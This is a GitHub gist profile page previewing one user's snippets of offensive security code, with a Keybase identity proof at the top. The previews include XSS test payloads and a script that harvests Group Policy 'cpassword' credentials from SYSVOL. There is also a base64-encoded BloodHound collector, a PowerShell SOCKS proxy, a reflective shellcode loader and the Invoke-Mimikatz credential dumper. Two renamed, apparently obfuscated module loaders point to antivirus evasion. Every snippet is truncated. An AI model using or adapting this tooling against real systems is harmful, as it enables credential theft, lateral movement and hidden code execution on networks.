I hereby claim:
- I am alacerda on github.
- I am alacerda (https://keybase.io/alacerda) on keybase.
- I have a public key ASDSq78cByBwvFr_Ezr7FuLAWLXQYcTrYMPc2AhX1fcFPwo
To claim this, I am signing this object:
alacerda
/ gist:db9e94c80ae4e39c0259125b20e384f3
Created
October 5, 2023 14:23
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <script>alert(1)</script> |
alacerda
/ gist:c8c6c33f3a8940bb71cb3b902edb33bc
Last active
September 1, 2023 18:17
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| function 026904T3 { | |
| [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSUseShouldProcessForStateChangingFunctions', '')] | |
| [CmdletBinding()] | |
| Param ( | |
| [Parameter(Position = 0)] | |
| [ValidateNotNullOrEmpty()] | |
| [String] | |
| $ModuleName = [Guid]::NewGuid().ToString() |
alacerda
/ gist:48ef36a42b86a5d81b83937ee00a2a2d
Created
August 30, 2023 20:26
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| $pwdfoundgpo = New-Object 'System.Collections.Generic.List[System.Object]' | |
| $DomainName = "" | |
| $Items = Get-ChildItem "\\$DomainName\SYSVOL\*\Policies" -recurse -Filter *.xml | |
| foreach ($XMLFileName in $Items){ | |
| [string]$XMLContent = Get-content ($XMLFileName.FullName) | |
| if($XMLContent.Contains("cpassword")){ | |
| [string]$Cpassword = [regex]::matches($XMLContent,'(cpassword=).+?(?=\")') |
This file has been truncated, but you can view the full file.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| ZgB1AG4AYwB0AGkAbwBuACAASQBuAHYAbwBrAGUALQBCAGwAbwBvAGQASABvAHUAbgBkACAAewAgACAAIAAgACAAPAAjACAAIAAgACAAIAAuAFMAWQBOAE8AUABTAEkAUwAgACAAIAAgACAAIAAgACAAIAAgAFIAdQBuAHMAIAB0AGgAZQAgAEIAbABvAG8AZABIAG8AdQBuAGQAIABDACMAIABJAG4AZwBlAHMAdABvAHIAIAB1AHMAaQBuAGcAIAByAGUAZgBsAGUAYwB0AGkAbwBuAC4AIABUAGgAZQAgAGEAcwBzAGUAbQBiAGwAeQAgAGkAcwAgAHMAdABvAHIAZQBkACAAaQBuACAAdABoAGkAcwAgAGYAaQBsAGUALgAgACAAIAAgACAAIAAuAEQARQBTAEMAUgBJAFAAVABJAE8ATgAgACAAIAAgACAAIAAgACAAIAAgAFUAcwBpAG4AZwAgAHIAZQBmAGwAZQBjAHQAaQBvAG4AIABhAG4AZAAgAGEAcwBzAGUAbQBiAGwAeQAuAGwAbwBhAGQALAAgAGwAbwBhAGQAIAB0AGgAZQAgAGMAbwBtAHAAaQBsAGUAZAAgAEIAbABvAG8AZABIAG8AdQBuAGQAIABDACMAIABpAG4AZwBlAHMAdABvAHIAIABpAG4AdABvACAAbQBlAG0AbwByAHkAIAAgACAAIAAgACAAIAAgACAAYQBuAGQAIAByAHUAbgAgAGkAdAAgAHcAaQB0AGgAbwB1AHQAIAB0AG8AdQBjAGgAaQBuAGcAIABkAGkAcwBrAC4AIABQAGEAcgBhAG0AZQB0AGUAcgBzACAAYQByAGUAIABjAG8AbgB2AGUAcgB0AGUAZAAgAHQAbwAgAHQAaABlACAAZQBxAHUAaQB2AGEAbABlAG4AdAAgAEMATABJACAAYQByAGcAdQBtAGUAbgB0AHMAIAAgACAAIAAgACAAIAAgACAAZgBvAHIAIAB0AGgAZQAgAFMAaABhAHIAcABIAG8A |
alacerda
/ keybase.md
Created
January 26, 2023 00:13
alacerda
/ intruderlabs
Created
September 20, 2022 22:12
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <# | |
| .SYNOPSIS | |
| Powershell Socks Proxy | |
| Author: p3nt4 (https://twitter.com/xP3nt4) | |
| License: MIT | |
| .DESCRIPTION | |
alacerda
/ gist:73c93f5ed2595aada3bd26f04ab9e482
Created
June 28, 2022 15:12
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Set-StrictMode -Version 2 | |
| function func_get_proc_address { | |
| Param ($var_module, $var_procedure) | |
| $var_unsafe_native_methods = ([AppDomain]::CurrentDomain.GetAssemblies() | Where-Object { $_.GlobalAssemblyCache -And $_.Location.Split('\\')[-1].Equals('System.dll') }).GetType('Microsoft.Win32.UnsafeNativeMethods') | |
| $var_gpa = $var_unsafe_native_methods.GetMethod('GetProcAddress', [Type[]] @('System.Runtime.InteropServices.HandleRef', 'string')) | |
| return $var_gpa.Invoke($null, @([System.Runtime.InteropServices.HandleRef](New-Object System.Runtime.InteropServices.HandleRef((New-Object IntPtr), ($var_unsafe_native_methods.GetMethod('GetModuleHandle')).Invoke($null, @($var_module)))), $var_procedure)) | |
| } | |
| function func_get_delegate_type { |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| function Invoke-Mimikatz | |
| { | |
| <# | |
| .SYNOPSIS | |
| This script leverages Mimikatz 2.0 and Invoke-ReflectivePEInjection to reflectively load Mimikatz completely in memory. This allows you to do things such as | |
| dump credentials without ever writing the mimikatz binary to disk. | |
| The script has a ComputerName parameter which allows it to be executed against multiple computers. | |
| This script should be able to dump credentials from any version of Windows through Windows 8.1 that has PowerShell v2 or higher installed. |
alacerda
/ gist:f3f08ed7efb270b7b28d488defb20c2a
Created
May 26, 2022 19:48
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <script>alert(1)</script> |
alacerda
/ gist:d1b27a732cd980bf6043b4489cbb7acb
Last active
May 11, 2022 21:02
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| function embroil { | |
| [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSUseShouldProcessForStateChangingFunctions', '')] | |
| [CmdletBinding()] | |
| Param ( | |
| [Parameter(Position = 0)] | |
| [ValidateNotNullOrEmpty()] | |
| [String] | |
| $ModuleName = [Guid]::NewGuid().ToString() | |
| ) | |
| $PhtttnVb99 = [Reflection.Assembly].Assembly.GetType('System.AppDomain').GetProperty('CurrentDomain').GetValue($null, @()) |
NewerOlder